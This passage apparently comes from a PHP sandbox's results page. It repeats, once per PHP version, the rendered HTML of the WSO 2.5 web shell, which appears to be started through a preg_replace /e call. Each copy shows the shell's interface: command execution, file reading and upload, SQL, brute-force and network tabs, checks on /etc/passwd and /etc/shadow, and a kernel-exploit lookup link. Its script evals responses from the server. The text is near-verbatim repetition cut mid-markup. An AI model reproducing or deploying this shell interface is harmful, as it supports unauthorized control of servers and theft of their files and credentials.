onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.3
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.3 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.2
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.2 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.1
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.1 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.6.0
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /in/a60Yl on line 2 <html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.6.0 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 